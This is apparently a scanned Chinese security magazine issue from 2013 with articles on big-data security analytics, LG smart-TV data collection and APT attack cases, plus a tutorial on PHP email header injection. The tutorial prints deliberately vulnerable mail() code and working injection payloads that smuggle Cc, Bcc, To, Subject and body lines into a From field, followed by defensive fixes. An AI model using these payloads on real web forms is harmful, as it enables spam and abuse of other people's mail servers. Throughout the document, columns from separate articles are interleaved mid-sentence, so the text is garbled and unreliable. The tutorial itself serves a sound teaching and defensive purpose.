以分析海量的网络流量，了解多个事件之间的联 将补救措施的效果记入文档。企业还可以让检测安 因此，大数据既带来了挑战，又带来了机遇。 系，并且结合这些信息，防止攻击发生。比如说， 全漏洞的工作实现自动化，针对异构基础设施，建 迈克菲的Boggaram对此进行了到位的总结：“随 可以把分析貌似无害的动作（比如在可疑时间发送 议按轻重缓急采取补救措施。此外，IBM提供了数 着安全要求不断变化，对情境、分析以及数据存储 或访问文件，从陌生位置和设备进行访问）关联起 据屏蔽技术（data masking），以便遮掩进出大 时间段的要求也发生了变化。这就是为什么如今的 来，了解某个威胁。 数据系统的敏感数据的身份。 安全既面临重大的安全数据挑战，又面临重大的机 遇。要是企业能收集所有这些数据，智能化管理和 RSA印度公司的全国区经理Kartik Shahani同 RSA公司的安全分析（Security Analytics） 分析数据，利用数据调查情况，那么面临的是机遇 意上述观点，他说：“如果将成熟的大数据平台和 平台利用大数据平台和先进的分析方法，这些分析 。要是如今的大多数传统分析工具无力收集和管理 分析方法集成到安全工具中，有望大大改善安全效 方法能够识别高风险活动，缓解高级威胁，并且满 需要的所有情境数据，那么面临的是挑战。数据负 果。面向实时风险管理的大数据安全分析可以持续 足合规目标。 载和分析压力已变得很大，这些数据管理系统已不 不断地监控，以便观察环境、监控未授权资产、管 堪重负。” 理配置以及检测安全漏洞，而面向风险管理的非对

014 ｜ 互联网安全 互联网安全 ｜ 015 封面故事 COVER STORY SECURITY INSIGHT 2013.11 www.securityinsight.com

链接 一 何谓大数据安全分析？ 链接 二 大数据安全分析的演变 Aamir Lakhani 知名网络安全与云顾问

大数据是指庞大复杂的数据集的集合体。大数据 具有数量大、多样化和复杂的特点，很难使用传统的 应用软件加以处理。 为何需要新的网络防御方法？ 流程和宝贵资产。它们并不完全依赖软件缺陷来发起 传统数据库只擅长处理彼此关系易于理解的相似 攻击，因而面对APT，安全专业人员平常使用的基于 数据集。 签名的传统解决方案基本上毫无用处。此外，攻击更 几年前，攻击者利用软件缺陷，钻系统的空子。这 多地依赖社会工程学、网络钓鱼和企业内部的逻辑缺 些年来攻击变得狡猾起来，不仅利用软件缺陷的漏 大数据安全分析解决方案的对象是非结构化数据 陷问题。这意味着没有必要突破针对外部用户的安全 洞，还结合使用社交工程学攻击，利用业务和逻辑缺 集，而非结构化数据查找和关联起来比较困难。这方 系统，因为通常已经在内部得逞了。 陷的漏洞。 面的例子包括：查找推特主题标签、道路施工、天气 及天气如何影响某个产品零售销售额之间的关系。就 安全专业人员常常在攻击者及自己的系统之间玩猫 算并非不可能借助传统数据库，建立和分析这些类型 捉老鼠的游戏。他们抢在攻击者钻空子之前，给系统 SIEM解决方案？ 的关系，至少也是非常困难。 打上补丁、堵住漏洞。补丁被打上后，攻击者对原来 的攻击手法加以改动，企图不断闯入存在同样缺陷的 大数据安全分析是一种基于多个数据源的演绎法， 大数据存在的挑战是，如何以一种引人注目的格 系统。安全设备已变得更智能化，能够检测出同一种 确定是否存在安全威胁风险。 式，获取、处理，存储、搜索、共享、分析及呈现大 攻击的新变体，因而让网络边界和边缘系统更难被突破。 量不同的数据。 这种演绎法基于源数据的准确性如何、价值如何。 防御战术已发生了变化，这主要归因于高级持续性 大数据安全分析使用来自网络设备的日志来源。在大 网络安全界正着眼于大数据，将安全事件与威胁 威胁（APT）。APT是针对企业发动的一种专门定制 多数情况下，这些日志来源是来自网络基础设施设备 情报结合起来。结果有人杜撰了大数据安全分析（Big 的威胁，可以钻人员和业务流程的空子，窃取金融和 的系统日志（SYSLOG）消息。这些日志可获取到专 Data Security Analytics）这个行业术语。 知识产权，并且长期悄无声息地潜伏在企业中。 门存储、签名及分析日志的系统，比如RSA LOG DECODER（RSA公司的安全分析平台的一个组件 按照维基百科的解释: 与以往的威胁不一样，APT并不造成破坏，因而 ）、SPLUNK，或者ALIEN VAULT公司的 不被受害者所察觉。攻击者知道，大多数IT部门人手 LOGGER（市面上还有其他此类系统，但这三种系统 “分析是指发现和传达数据中有意义的模式。分析在 不足、不堪重负。他们正是钻了这个空档，没有对企 是我最常遇到的系统）。在大多数情况下，将来自网 有大量记录信息的方面显得尤为宝贵，依赖于同时运 图闯入的企业大动手脚，也没有发起拒绝服务攻击。 络设备的有待分析的事件记入日志，是系统信息和事 用统计学、计算机编程和运筹学，以量化性能。分析 我最喜欢的来自《超人》漫画中的一句名言是：“真 件管理（SIEM）工具的一个重要部分。 常常倾向于使用数据可视化传达洞察力。” 正的实力最好秘而不宣。”

APT需要攻击者暗底了解企业的工作人员、业务

016 ｜ 互联网安全 互联网安全 ｜ 017 封面故事 COVER STORY SECURITY INSIGHT 2013.11 www.securityinsight.com

SIEM工具普遍擅长于下列任务： 录用户都是合法的，有权管理服务器，又怎样？根据 全包捕获是关键吗？ 管理员或拥有类似访问权的别人的以往行为，所用的

在一个地方集中收集和存储来自网络设备的日志， 工具和命令是否正常？工具或命令有没有构成任何已 这里绝不是说你需要在网络上启用全包捕获（ 可以在此存储、查看和分析日志，以识别威胁。 知的威胁？把大多数SIEM工具不会注意的这些多种类 full-packet capture）功能，查明安全威胁是否 型的活动关联起来。此外，高速分布式系统、基于云 存在。在许多情况下，Netflow技术可提供深入分析 这些日志种类丰富，但受制于记录到日志的源设备 计算的服务及活动/活动数据中心上的这些事件数量众 元数据的功能，查明风险是否存在，这远远超出了传 大数据安全分析提供了一个平台， 的数量。管理员必须配置网络上的每个设备，将日志 多，因而SIEM解决方案不可能使用传统数据库，写 统SIEM产品的能力范畴。 发送到SIEM工具。此外，有些工具并不发送系统日志 入、存储和分析这些信息。 可用于收集来自多个数据源的安全数 信息，而是使用其他日志方法，这可能采用推送或拉 不过，大数据的基础是数据。在过去，你分析、访 据，而不仅局限于企业内外的传统日志 取的方式。大多数SIME工具的成本还取决于该工具监 大数据安全分析的基本承诺和价值在于，获取、关 问及捕获的数据越多，一般会给企业带来越准确的威 信息。不是根据签名或静态关联规则进 控的事件或设备的总数量，而这会增加费用和复杂性。 联和分析这些活动，确定风险值，从而查明威胁是否 胁情报状况。全包捕获的优点在于会话重建（ 存在，并且重新构建事件，以调查事件。 session reconstruction），以检测和研究攻击者如 行检测，而是根据动态比较工作职能和 为企业的安全状况确立基准。 何渗入到企业环境，一旦进入到里面，他们在搞什么 需求类似的个人或群体的正常基准行为 破坏。 SIEM解决方案有助于为企业的安全状况确立基 进行检测。偏离正常基准的行为确定这 准。大多数安全专业人员致力于SIEM解决方案所检 大数据安全分析旨在结合多个数据源。它提供了一 是可疑活动，可能表明攻击者在活动。 测的警报，忽视了其他所有数据。他们实际上试图找 个平台，可自动获取来自外部来源的威胁情报，提供 这加快了识别威胁的速度――安全厂商 到“淹没在噪声中的信号”。 企业外面的威胁环境的宝贵信息，并将其与企业里面 发生的事件的当前行为作一番比较。 没有对威胁进行分类，还在企业里面提 这些系统的工作方式是，将来自多个设备的事件信 供了效率，那样企业就能重视本企业里 息关联起来，使用预定义的规则丢弃不相关的信息， 比如说，如果企业里面多个人受到了鱼叉式网络钓 面出现的安全事件的风险。 让更频繁的事件或带来更大风险的事件浮出水面。 鱼攻击，传统的电子邮件安全设备就很可能发现并阻 止这种攻击，比如思科的IronPort电子邮件安全 传统的SIEM常常无法全面地剖析企业面临的所有 设备。 风险。那是由于SIEM只收集来自IT基础设施某些部分

的信息，留下了关键的盲点。 大数据安全分析有助于查明网络钓鱼攻击是否来自 某个特定的Facebook帐户，开始攻击贵企业里面“ 这些盲点又是哪些呢？传统SIEM可能反复核实： 点赞”某个Facebook页面，又属于贵企业会计部门 拥有相应访问权的笔记本电脑是不是在正当访问，以 的某些人。这种针对性的活动常常表明企业遭到了 便管理某台敏感服务器？使用这台笔记本电脑的用户 APT攻击。 其身份如何？他是不是可以正当使用笔记本电脑，对

笔记本电脑连接的那台服务器执行管理任务？ 此外，来自全包捕获的分析有助于查明攻击者使用 哪些工具，查明他们企图在如何偷偷窃取数据集。 可以在此基础上再引申一下，如果笔记本电脑和登

018 ｜ 互联网安全 互联网安全 ｜ 019 封面故事 COVER STORY SECURITY INSIGHT 2013.11 www.securityinsight.com

主要厂商包括LexisNexis、Hexis Cyber Solutions 由于安全人员再也跟不上形势的要求，对安全自动化 链接 三 大数据安全分析的关键： 和Narus。 的需求会越来越大。思科公司会使用其网络基础设 施、软件定义网络（SDN）和基于云计算的大数据安 算法、可视化、情境和自动化（AVCA） ·情境 当恶意软件攻击没有打上补丁的系统时， 全智能，实现网络安全自动化。Check Point和Palo 情况显得很危急。另外，当恶意软件攻击已打上补丁 Alto Networks等其他网络安全专业厂商也会走这条

Jon Oltsik ESG 高级分析师

的系统时，情况根本不是很危急。大数据安全分析解 道路。IBM在这方面同样不甘示弱，将其网络安全产 品系列（即ISS）和Trusteer（即端点安全解决方案） “ 决方案会逐渐结合威胁检测/取证分析和持续监控，从 与QRadar数据分析软件、IBM Security Intelligence 安全厂商们必须关注这四个方面，从而帮助企业组织改善安全效果和 而计算出与网络攻击有关的风险分值。迈克菲公司通 “ 过整合迈克菲安全管理器（即Nitro）和ePO，将推动 with Big Data解决方案和X-force安全智能产品整合 运营效率。 这个议程。RSA会将其大数据安全分析解决方案与 起来。 Archer结合起来，同样往这个方向迈进。惠普也会走 这条道路。 专门研究和评估大数据安全分析产品的安全专业

企业战略集团（ESG）的研究表明，44%的企业 Context）和自动化（Automation），分别阐述如下。 人员应该确保，让AVCA成为其需求的一部分。至于 认为其目前采用的安全数据收集和分析机制可以被归 · 自动化 这方面可能需要假以时日，因为这类似 供应商方面，AVCA也许是通往成功的一条捷径。 入“大数据”这类；另有44%的企业认为，其采用的 ·算法 就大数据安全分析而言，算法代表了手动 从入侵检测系统（IDS）向入侵防御系统（IPS）转 安全数据收集和分析机制在未来两年内可以被归入“ 分析与自动分析的差异。要是有算法，贵企业的分析 型，安全专业人员总是担心由此带来的误报。不过， 大数据”这类。（注意：这里的大数据安全分析被定 人员可以得到智能技术的支持；要是没有算法，他们 义为“变得很庞大的安全数据集，以至于很难使用现 将只好凭一己之力，费劲地分析越来越多的数据。大 有的安全分析工具来分析”）。 数据安全分析算法应该可以结合数据、处理能力和自 定义规则，可以获得很高的精确性。具体例子包括机 所以，企业很可能会在未来几年采用某种类型的大 器学习（即21CT、LogRhythem和SilverTail等），

数据安全分析产品或解决方案。话虽如此，我采访的 以及异常行为检测（即Click Security、Lancope、 清楚了解大数据定义 多位首席信息安全官（CISO）对这类新兴的解决方案 Netskope和Solera Networks等）。许多企业还使用 仍一头雾水，需要有人帮他们认清炒作。 Splunk作为其自定义算法的基础。

最近我在个人博客上开设了大数据安全分析常见问 ·可视化 安全领域的数据可视化仍然处于初期阶 题解答（FAQ），希望在这方面有所帮助。这给出了 段，主要采用饼图、图表和Excel电子表格数据透视表 这类解决方案的基本定义，但产品本身方面又如何呢？ 等手段。如今可视化技术是个新兴领域，但是越来越 当然，所有大数据安全解决方案都必须提供大规模处 多的研发工作已经在开展当中，主要是在美国国家实 理和灵活查询功能，但又是什么功能特性让一种解决 验室和学术机构等地方。此外，每年在佐治亚州亚特 方案有别于其他所有解决方案呢？ 兰大举办的VizSec大会（www.vizsec.org）致力于研究 和推广网络安全领域的数据可视化技术。随着时间 鉴于安全行业向来喜欢缩略词，我建议安全专业人 的推移，CISO们有望在这个方面看到巨大变化，包 员不妨从AVCA方面来考虑，这个缩略词代表：算法 括新型可视化硬件、表格式数据处理，以及用于模式 来源：欧洲最大信息安全行业峰会Infosecurity 2012（欧洲）对大数据安全的调查 （Algorithms）、可视化（Visualization）、情境（ 匹配、风险评分分析和数据透视的3D图形。这方面的

020 ｜ 互联网安全 互联网安全 ｜ 021 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

LG智能电视是如何收集用户数据的？

JohnChu

如果你是一位LG智能电视用户，那么一定要在近期注意是否收 到了系统固件的更新提示。最近LG公司公开承认了之前媒体报道的 关于旗下某些智能电视会收集频道、电视平台及广播源等用户数据， 即使用户在禁用或关闭相关功能也不例外的行为。

根据CNET的报道，虽然LG公司一再表示这些数据是通过匿名 的方式发送到LG的服务器上，但是事实上也也是一种存在的搜集用 户信息的行为。

当这种功能正常运行时，将有助于帮助其它LG智能电视用户提 供更好的收看建议。当被问及该功能还会传输用户互联USB Key文 件名的情况，LG公司也承认该功能是该公司即将推出服务的一部分 内容，并且该服务可通过搜索互联网中与某部电影或电视剧的相关信 DoctorBeet对他智能电视的流量进行审查后发 Jason称上传的数据是未经加密的。 息提供给消费者。 现，每次更换频道时，一个独一无二的设备ID和电 视频道名会被传送。

收集行为是如何发现的 例如： 数据收集无法关闭 来自英国的IT顾问、开发者、Linux狂热爱好 者Jason Huntley在名为“DoctorBeet”的博客 里称，他发现家里的LG智能电视正在监视他！并 将关于他的一些数据以及他正在看什么频道等信息 发出，甚至还会搜集连接电视的设备信息，可能想 更好地了解用户，并定向推送广告信息，类似于谷歌 广告，也是根据用户的搜索内容和习惯来推送，如此 一来，广告的定向性和精准性得到很好的保障。

Jason是如何发现这种情况的呢？其实就是那 些广告，因为这些广告开始出现在电视的智能登陆 屏幕。再仔细看会发现有一个“观看信息收藏”选 项，这个选项是默认打开的。当然，就算将它关闭， 数据仍然会被传送出去。

022 ｜ 互联网安全 互联网安全 ｜ 023 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

在智能电视的设置菜单中有一个选项可以关闭 数据收集，但Jason观察到这个选项毫无用处。LG PHP邮件注入攻击及原理 的隐私政策强制LG客户接受数据收集。 littlehan

Jason还发现，智能电视发送信息的URL并不 存在，有时数据返回的的是HTTP 404 错误信息， 但是URL可能第二天就会被LG公司打开，开始收 集用户信息。 互联网的使用急剧上升,大多数用户都会通过邮件 比如一个新的收件人列表或一个完全不同的消息 的方式和他人进行通信。出于这个原因,大多数网站 体。因为MIME格式使用回车分隔在数据包中信息 根据LG隐私政策声明，LG收集的个人信息包 允许用户联系他们：向网站提供建议、报告问题或 (HTTP数据包中的每一行之间都有一个换行符,在 括姓名，邮箱地址，物理地址和公司名，还包括IP 提供反馈，用户将会发送反馈给网站管理员的电子 POST和HTTP HEADER之间有两个换行符),通 地址和产品信息。 邮件。 过添加回车提交表单数据(使用FB的一些插件可以 很容易的做到),可以允许一个简单的留言板是用来 不幸的是,大多数web开发人员对安全编码（ 发送成千上万的消息。同样,一个垃圾邮件发送者可 Code-Security）没有足够的认识,其中一些程序员 以使用这种战术的恶意发送大量的匿名消息。 使用现成的库或框架，其中包含许多已知的漏洞。这 如何终止收集行为 些漏洞都已经公布,厂商也已对其进行了修补，并且 电子邮件注入是针对PHP内置邮件功能的一种 相应的攻击源代码在互联网上都可下载的,但大多数 攻击类型。它允许恶意攻击者注入任何邮件头字段 ad.lgappstv.com 开发人员都懒得升级到最新版本。 ,BCC、CC、主题等,它允许黑客通过注入手段从 LG公司已经针对这种行为表示了歉意，并且 “ 受害者的邮件服务器发送垃圾邮件。由于这个原因, 今天我们要谈论电子邮件注射--攻击者可以使用 这种攻击称为电子邮件注入,或者邮件形式滥发。这 承诺虽然该公司从来都不会储存用户私人数据， yumenetworks.com 但是仍将继续努力达到所有用户和公众对该公司 你的邮件服务器来发送垃圾邮件。 个漏洞是不限于PHP。它可能会影响任何从用户 UI接收消息并发送电子邮件消息的应用程序。这种 的期望值，并且系统通过更新智能电视固件的方 smartclip.net 式来清除任何可能为用户带来相关困扰的方式。 攻击的主要原因是不适当的用户输入验证或应用程 序根本没有验证和过滤机制。 smartclip.com LG公司已公开表示，目前将针对智能电视产

品开发新固件，并且更新后用户可以自行选择是 什么是邮件注入？

否允许上传自己的电视节目及设置信息。 smartshare.lgtvsdp.com “ 邮件注入的攻击原理 我们看下维基百科对邮件注入的定义： 在新的固件没有发布之前，既然无法在设置 ibis.lgappstv.com 中国古话说得好: 知其然才能知其所以然。 中关闭，我们只能自想办法了，目前，最有效的 电子邮件注入是一个安全漏洞,这种漏洞广泛存在

办法是将以下的域名屏蔽： 于在互联网电子邮件收发应用中。这是电子邮件注射 和HTTP头注射类似。和SQL注入攻击类似,这种漏 为了解释邮件注入的工作原理，我们必须先了解 洞是一类常见的的漏洞,发生在当一个编程语言是嵌 PHP Email函数的工作原理。下面是从PHP 入到另一个，例如MYSQL嵌入到PHP中。 Manual中找到API解释 个人信息泄露的问题越来越受到关注，你刚刚还在怀疑Kinect会不会监视自己或是看穿自己的衣服，

智能电视现又成为人们担心的对象。随着越来越多智能的玩意儿进入家庭，需要隐私和安全保护的手段及 当一个可以提交数据到一个Web应用程序表单被 mail(): 时跟上。 添加到一个Web页面,恶意用户可能会利用MIME格 http://www.php.net/manual/en/function.- 式添加额外的信息到要发送的消息中(POST/GET), mail.php

024 ｜ 互联网安全 互联网安全 ｜ 025 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

bool mail ( string $to , string $subject , string 第一部分 功提示 “Your mail has been sent success- 1) Cc/Bcc注入 $message [, string $additional_headers [, fully”。如果出现错误，将提示相应信息 “An string $additional_parameters ]] ) error has been occurred” 在发送者字段(sender)后注入Cc和Bcc参数 From:[email protected]%0ACc:recipi- 你可以注意到,这需要三个必填参数(”目的地 但是有朋友要问了，问题在哪里?主要的问题 [email protected]%0ABcc:recipi- 、主题和消息”)和其他一些可选参数和函数返回 对用户的输入没有做必要的验证和过滤，正如《白 [email protected] 一个布尔值。 这段代码将检查表单提交或不是。用户点击提 帽子讲web安全》里说到的，任何的安全问题可以 交按钮和普通访问这个页面脚本的响应将是不同 归结为信任的问题，这里存在的问题就是程序代码 所以现在,消息将被发送到recipient和recipi- 那么让我们来看看一个带漏洞的代码来演示这 的,如果这段代码返回True(if语句中的判断最终结 对用户的输入无限制的信任。正如你所看到的在第 ent1账户。 个漏洞: 果为true)这意味着表单没有提交。表单将出现,等 三部分代码,发送邮件功能代码从用户接收输入(包 待用户输入。另一方面,如果它返回”False”,这 括邮件主题、消息和来源等)，参数没有过滤和验 2) 参数注射 意味着表单已经提交,所以电子邮件将被发送。 证。因此,恶意攻击者可以任意控制这些参数的值 ，用户发送inject攻击。 第二部分 From:[email protected]%0ATo:at- 为了使用PHP作为邮件发送代理，我们需要对 [email protected] PHP.INI进行简单的配置： [mail function] 现在消息将被发送到原来的收件人和攻击者帐 ; For Win32 only. 户。注意，这里的攻击者的账户是我们通过注入额 ; http://php.net/smtp 外传入的。 SMTP = smtp.qq.com 第二部分是一个HTML表单标记,这要求用户输入。 ; http://php.net/smtp-port 3) 邮件主题注入 smtp_port = 25 第三部分 From:[email protected]%0ASu- 出于演示目的,我们将使用前面的带漏洞的代 bject:This’s%20Fake%20Subject 码。此外,我们将提交下列值作为发送邮件的参数: mail(“[email protected]”, “Call me 攻击者注入的假的主题subject将被添加到原来 urgent”, “Hi,nPlease call me 的主题中并且在某些情况下将取代原本的主题 ASAP.nBye”, “From: littlehann@fox- subject。这取决于邮件服务行为。即代码编写的 mail.comn”) 容错性，当参数中出现两个subject的时候代码是 表单发送的HTTP数据包: 选择丢弃还是后者覆盖。

从攻击者的角度来看,有许多额外的字段,可 4) 改变消息的主体body 以被注入在邮件标题。更多信息见RFC 822。 例如，CC(抄送)或者BCC(密送)允许攻击者插入 要注意SMTP的Mail格式，消息主题和头部 更多的消息。 Header之间有两个换行符(和HTTP是一样的)。 From:sender@do- 在前面的代码中我们可以特别注意这一行 但要注意的是，我们在添加一个新的参数之 main.com%0A%0AMy%20New%20%0- 前面的代码将用于演示目的和解释我们的攻击 mail($to,$_POST['subject'],$_POST['mes- 前，我们必须增加一个换行符分隔每个字段。换 Fake%20Message. 原理。我们将前面的代码分成三个部分: sage'],”From: $fromn”), PHP的mail()函数需 行符的16进制值为”0x0A”。下面是一个demo 假消息将被添加到原始消息中。 要subject, message, from 这些参数。如果函数 code。 执行成功，由PHP引擎发送邮件后，将打印出成

026 ｜ 互联网安全 互联网安全 ｜ 027 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

实战演示 1) 正常发送 4) 改变消息的主体body

这里要注意的的，SMTP区 这里提示一下，直接配置 分消息头部和消息主题是依据 php.ini原生的email功能可能不 %0A%0A双换行符决定的。 太好用，配置起来也麻烦，建议 采用一些第三方的Email系统 发送邮件后，我们发现消息 (WP就挺不错的)进行发送，这 的消息体已经被修改了。 个模块已经把相关的交互和 2) Cc/Bcc注入 HTTP数据包的构造封装好了。 在From字段添加Inject Payload

附带上一些实验截图：

发送邮件后，增加了抄送的功能:

以上就是我在本地的PHP环境中模拟实验的结果，因为环境和程序代码处理逻辑的差异，可能在不同的 环境下实验会有差异，我的经验是根据不同的PHP CMS系统的Email源代码进行分析，理清发送Email数 据包的代码逻辑，有针对性的进行email 注入。

3） 邮件主题注入 我们在from的参数加添加subject字段 解决方案

1 永远不要信任用户的输入字段。所有用户输入应该被认为 是不可信的和潜在的恶意。应用程序不受信任的输入过程 可能会变得容易受到诸如缓冲区溢出攻击、SQL注入,OS

接收邮件后: 指令注入、拒绝服务和电子邮件注入。

2 使用正则表达式来过滤用用户提交的数据。例如,我们可以 在输入字符串中搜索(r 或 n)。

3 使用外部组件和库,提供防范这个问题像 ZEND mail、 PEAR mail和swift mailer。

可以看到，原本的subject被注入语句覆盖了一部分内容，但是具体是覆盖还是附加和具体的PHP代码 4 ModSecurity可以阻止服务器级别的电子邮件注入。利用 编写逻辑有关，因为现在CMS对Email发送的普通做法就是利用PHP进行HTTP/HTTPS数据包的构造， ModSecurity,我们可以检测通过POST或GET提交的 先在本地构造好数据包后，再想服务器发送。 CC, BCC或目的地址，并且拒绝任何包含这些字母请求。

所以不同的系统对email注入的效果会有所不同。

028 ｜ 互联网安全 互联网安全 ｜ 029 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

者直接定位到中国军方。在美国旧 网络空间安全未来将来首要应对 3）内网机器如AD服务器或开发人 新型威胁分析与防范研究 金山举办的RSA2013大会上，直 的问题就是APT，此外还包括僵 员电脑遭攻击成功，多半是被密码 接以中国APT攻击为主题的报告就 尸网络、传统蠕虫和病毒等。 暴力破解； 叶蓬 启明星辰公司SOC（信息安全管理）咨询顾问 有6个之多。 4）被黑机器被植入恶意代码，多 以防范APT攻击为引子，各国 半被安装远端控制工具（RAT）， 纷纷加强国家级的网络空间安全研 传回大量机敏文件（WORD、 究、相关政策制定与发布。美国、 新型威胁实例说明 PPT、PDF等等），包括所有会 通过对以APT为代表的新型威 破坏或抵制某项使命或任务，或者 基础设施。 加拿大、日本、欧盟各国、北约等 议记录与组织人事架构图； 胁的实例研究，分析了新型威胁的 潜伏起来以便在未来的某个时候达 国家和组织纷纷强化其网络空间安 下面列举几个典型的APT攻 攻击过程、技术特点、当前国内外 成这些目标。APT为了达成其目标 全的国家战略，其中就包括应对包 击实例，以便展开进一步分析。 5）更多内网机器遭入侵成功，多 的发展现状，给出了新型威胁的基 会持续较长的一段时间，会想方设 新型威胁发展态势 括APT在内的国家级的敌对方的攻 半为高阶主管点击了看似正常的邮 本定义和描述，以及应对新型威胁 法隐匿自己，会与外界保持一定程 击。ENISA（欧洲网络与信息安 1.Google极光攻击 件附件，却不知其中含有恶意代码。 的总体思路和具体具体手段。最 度的交互以执行其任务。 2013年4月份Verizon发布的 全局）、北约CCDCOE（协作网 后，本文还简要叙述了新型威胁自 《2013年数据破坏调查报告》分 络空间防御卓越中心）、兰德公司 2010年的GoogleAurora（ 身的技术发展动向。 一般认为，APT攻击就是一类 析了全球47000多起数据破坏安全 、欧洲智库SDA公司都对世界主 极光）攻击是一个十分著名的 3.超级工厂病毒攻击（震网攻击） 特定的攻击，为了获取某个组织甚 事故，621宗确认的数据泄漏案 要国家的网络空间安全战略思想、 APT攻击。Google的一名雇员 至是国家的重要信息，有针对性地 例，以及至少4400万份失窃的记 安全威胁特征、安全防御水平等进 点击即时消息中的一条恶意链 著名的超级工厂病毒攻击为人所 什么是新型威胁？ 进行的一系列攻击行为的整个过 录。《报告》指出有高达92%的数 行了较为深入的对比分析与研究。 接，引发了一系列事件导致这个 知主要源于2010年伊朗布什尔核电 程。APT攻击利用了多种攻击手段， 据破坏行为来自外部，有19%的数 搜索引擎巨人的网络被渗入数 站遭到Stuxnet蠕虫的攻击的事件曝 包括各种最先进的手段和社会工程 根据CN-CERT发布的《 月 ，并且造成各种系统的数据被 光。遭遇超级工厂病毒攻击的核电站 网络安全，尤其是Internet互 据破坏行为来自国家级别的行为， 学方法，一步一步的获取进入组织 2012年我国互联网网络安全态势 窃取。这次攻击以Google和其它 计算机系统实际上是与外界物理隔离 联网安全正在面临前所未有的挑 利用脆弱的或者窃取到的用户身份 内部的权限。APT往往利用组织内 综述》，我国面临的新型威胁攻击 大约20家公司为目标，它是由一 的，理论上不会遭遇外界攻击。坚固 战，这主要就是来自于有组织、 访问凭据进行入侵的行为占到了 部的人员作为攻击跳板。有时候， 的形势还是比较严峻的。利用“火 个有组织的网络犯罪团体精心策 的堡垒只有从内部才能被攻破，超级 有特定目标、持续时间极长的新型 76%，而各种黑客行为和恶意代码 攻击者会针对被攻击对象编写专门 焰”病毒、“高斯”病毒、“红色 划的，目的是长时间地渗入这些 工厂病毒也正充分的利用了这一点。 攻击和威胁，国际上有的称之为 依然是主要的信息破坏手段。 的攻击程序，而非使用一些通用的 十月”病毒等实施的高级可持续攻 企业的网络并窃取数据。 APT（Advanced Persistent 攻击代码。 击（APT攻击）活动频现，对国家 2011年，一种基于Stuxnet代码 Threat，高级持续性威胁）攻击， 根据FireEye发布的《2012年 和企业的数据安全造成严重威胁。 2.夜龙攻击 的新型的蠕虫Duqu又出现在欧洲， 或者称之为“针对特定目标的攻 下半年高级威胁分析报告》指出， 此外，APT攻击具有持续性， 2012年，我国境内至少有4.1万余 号称“震网二代”。Duqu主要收集 击”。这些攻击统称为新型威胁。 平均一个组织和单位每三分钟就会 甚至长达数年。这种持续体现在攻 遭受一次恶意代码攻击，特指带有 台主机感染了具有APT特征的木马 夜龙攻击是McAfee在2011 工业控制系统的情报数据和资产 击者不断尝试各种攻击手段，以及 程序。 年2月份发现并命名的针对全球主 信息，为攻击者提供下一步攻击的 2011年美国NIST发布了《 恶意附件、或者恶意WEB链接、 在渗透到网络内部后长期蛰伏，不 要能源公司的攻击行为。该攻击 必要信息。 SP800-39管理信息安全风险》。 或者CnC通讯的邮件；在所有遭受 断收集各种信息，直到收集到重要 各国对新型威胁的重视，也带 的攻击过程是： 其中，对APT进行了定义：拥有高 攻击的企业和组织中，拥有核心关 情报。 动了整个网络空间安全市场的崛起 4.RSA SecurID窃取攻击 级专家和丰富资源的敌对方使用多 键技术的技术类企业占比最高。 。2012年6月份，Marketand- 1）外网主机如Web服务器遭攻 种攻击技术（包括网络的、物理的、 更加危险的是，这些新型的攻 Market公司发布了一份市场分析 击成功，多半是被SQL注入攻击； 2011年3月，EMC公司下属的 欺骗性的）为达成其一系列目标而 此外，国际上，尤其是美国着 击和威胁主要就针对国家重要的 报告，称到2017年，全球的网络 RSA公司遭受入侵，部分SecurID技 实施的一类威胁。通过在目标组织 重炒作来自中国的APT攻击。最典 基础设施和单位进行，包括能源 空间安全市场将达到1200亿美元 2）被黑的Web服务器被作为跳 术及客户资料被窃取。其后果导致很 的IT基础设施中建立并扩展落脚 型的是Mandiant公司发布的《对 、电力、金融、国防等关系到国计 的规模，而在2011年市场价值已 板，对内网的其他服务器或PC进 多使用SecurID作为认证凭据建立 点，这些目标通常包括窃取信息， APT1组织的攻击行动的情报分析 民生，或者是国家核心利益的网络 报告》，将APT1攻击行动的发起 经有637亿美元。报告明确指出， 行扫描； VPN网络的公司——包括洛克希德

030 ｜ 互联网安全 互联网安全 ｜ 031 前 沿 THE CUTTING EDGE SECURITY INSIGHT 2013.11 www.securityinsight.com

12.Xtreme RAT攻击 13. Beebus攻击 马丁公司、诺斯罗普公司等美国国 一份报告公开了主要针对全球化工企 2012年5月份，一种比震网（ 防外包商——受到攻击，重要资料 业的进行信息窃取的Nitro攻击。该 Stuxnet）和毒酷（Duqu）更具杀 2012年11月，TrendMicro曝光了一个关于针对以 2013年4月份，FireEye披露了一个名为Beebus 被窃取。在RSASecurID攻击事件 攻击的过程也十分典型： 伤力的病毒——火焰病毒（Flame 色列美国等国的基于Xtreme RAT的网络攻击。在这 的、重点针对航天和国防企业的持续性攻击行动。 中，攻击方没有使用大规模SQL注 1）受害企业的部分雇员收到带有欺 ）曝光。火焰病毒攻击首先主要是 次攻击行动中，攻击者以DEBKA的名义发送给受害人 攻击依然是从邮件开始的。攻击者利用了3个PDF 入，也没有使用网站挂马或钓鱼网 骗性的邮件； 在中东地区传播。火焰既是病毒又 （例如以色列警察局）一封邮件，题为“以色列国防 漏洞和2个WORD漏洞精心设计了一组极具迷惑性 站，而是以最原始的网路通讯方 是木马，既能够借助网络和U盘等进 军在加沙行动的报道和图片”，里面有个RAR文件。 的PDF和WORD文档。受害人十分容易上当打开文 式，直接寄送电子邮件给特定人士， 2）当受害人阅读邮件的时，只要执 行传播，又能够通过C&C让攻击者 一旦受害人打开这个RAR文件，会有一个word文档， 档，而只要他/她的PDF或者WORD程序有符合的 并附带防毒软体无法识别的恶意文件 行了附件中的可执行程序，就会被植 可以远程控制。一旦电脑系统被感 里面都是与邮件题目相符的新闻报道。但是同时，攻 漏洞，那么就会中招，植入后门程序。木马后门在 附件。 入Poison Ivy后门程序。 染，病毒将开始一系列复杂的行动， 击者在这个RAR中植入了一个Xtreme RAT工具，只 与攻击者的C&C服务器通讯也都是采用BASE64加 包括监测网络流量、获取截屏画 要一打开这个word，就中招了。以后，攻击者就能够 密方式，并且将服务器域名伪装的比较看似比较正规 5.Shady RAT攻击（暗鼠攻击） 3）攻击者在获取了加密的帐号信息 面、记录音频对话、截获键盘输 利用这个RAT远程的窃取客户的相关资料和信息。 